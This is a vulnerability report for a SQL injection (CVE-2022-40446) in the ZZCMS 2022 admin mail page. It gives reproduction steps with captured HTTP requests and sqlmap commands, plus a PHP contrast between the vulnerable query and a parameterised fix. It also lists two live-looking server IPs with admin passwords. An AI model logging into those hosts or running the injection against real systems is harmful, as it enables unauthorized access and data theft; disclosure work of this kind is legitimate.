CVE-2022-40446: ZZCMS2022 is vulnerable to SQL injection · Issue #4 · liong007/ZZCMS

ZZCMS 2022 was discovered to contain a SQL injection vulnerability via the component /admin/sendmailto.php?tomail=&groupid=.


**Exploit Title:** ZZCMS2022 is vulnerable to SQL injection
Google Dork: ZZCMS
Software Link:
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip
http://www.zzcms.net/download/zzcms2022.zip
Version: ZZCMS 2022
**Tested on:** Windows Server 2008, Ubuntu
Attack vector(s):
ZZCMS is a content management system (CMS) developed by China's zzcms team.
ZZCMS2022 is vulnerable to SQL injection via /admin/sendmailto.php?tomail=&groupid=.
Vendor Homepage: http://www.zzcms.net/about/6.html

Immediately after deployment the site reports its version as “powered by zzcms2021”; the next day it is automatically upgraded to “powered by zzcms2022”.

Affected pages:
Any page that includes “/admin/sendmailto.php?tomail=&groupid=”

For example:
Access requires an IP address in China.
Case 1:
Login http://119.28.176.129/admin
User: admin
Password: 123456

1) Click “发E-mail” (send e-mail), then click “发送” (send). The page returns the error “select email from zzcms_user where groupid=1 order by id asc limit 0,2完成”

The condition value in this SELECT statement is not enclosed in single quotation marks, which may lead to SQL injection.

2) Capture the request and locate the injection point:

```
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
Host: 119.28.176.129
```

3) Scan with sqlmap:

```
sqlmap.py -r sql2022.txt
```

The contents of sql2022.txt are as follows:

Sqlmap scan results:

Case 2:
Login http://175.6.210.20:81/admin
User: admin
Password: 123456789qwe

1) Click “发E-mail” (send e-mail), then click “发送” (send). The page returns the error “select email from zzcms_user where groupid=1 order by id asc limit 0,2”

The condition value in this SELECT statement is not enclosed in single quotation marks, which may lead to SQL injection.

2) Capture the request and locate the injection point:

```
GET /admin/sendmailto.php?tomail=&groupid=1&subject=&mailbody=&Submit=%E5%8F%91%E9%80%81 HTTP/1.1
Host: 175.6.210.20:81
```

3) Scan with sqlmap:

```
sqlmap.py -r sql2022-2.txt
```

The contents of sql2022-2.txt are as follows:

Sqlmap scan results:
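
The unquoted condition seen in both cases above, as an added example that is not ZZCMS's own code: a hypothetical reconstruction of the query pattern the error message implies, beside the parameterised form a fix should use. The PDO handle, the demo rows and the function names are assumptions; note that simply adding quotes around the value is not the fix, type validation plus a bound parameter is.

```php
<?php
// Added example, not ZZCMS's code: a hypothetical reconstruction of the query
// pattern implied by the report's error message, beside a parameterised version.
// Table, column and parameter names come from the report; the PDO handle and
// the demo rows are constructed here.

// Vulnerable pattern: the request value is spliced into the SQL text unquoted,
// so whatever the client sends becomes part of the statement.
function recipientsVulnerable(PDO $pdo, array $get): array
{
    $groupid = $get['groupid'] ?? '';
    $sql = "select email from zzcms_user where groupid=$groupid order by id asc limit 0,2";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed pattern: validate the type, then bind the value as a parameter. Merely
// wrapping $groupid in single quotes is not a fix: the value would still be
// spliced into the SQL text and a quote in the input would still end the literal.
function recipientsFixed(PDO $pdo, array $get): array
{
    $groupid = filter_var($get['groupid'] ?? null, FILTER_VALIDATE_INT,
                          ['options' => ['min_range' => 1]]);
    if ($groupid === false) {
        throw new InvalidArgumentException('groupid must be a positive integer');
    }
    $stmt = $pdo->prepare(
        'SELECT email FROM zzcms_user WHERE groupid = :groupid ORDER BY id ASC LIMIT 0, 2'
    );
    $stmt->bindValue(':groupid', $groupid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed demo data in an in-memory SQLite database (a stand-in for the site's DB).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE zzcms_user (id INTEGER PRIMARY KEY, groupid INTEGER, email TEXT)');
$pdo->exec("INSERT INTO zzcms_user VALUES (1, 1, 'a@example.com'), (2, 2, 'b@example.com'),
            (3, 1, 'c@example.com'), (4, 1, 'd@example.com')");

// Well-formed request: the first two group-1 addresses, as the original query intends.
print_r(recipientsFixed($pdo, ['groupid' => '1']));

// Malformed request: rejected before any SQL is built, whereas recipientsVulnerable()
// would hand the raw string straight to the database.
try {
    recipientsFixed($pdo, ['groupid' => '1 abc']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```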
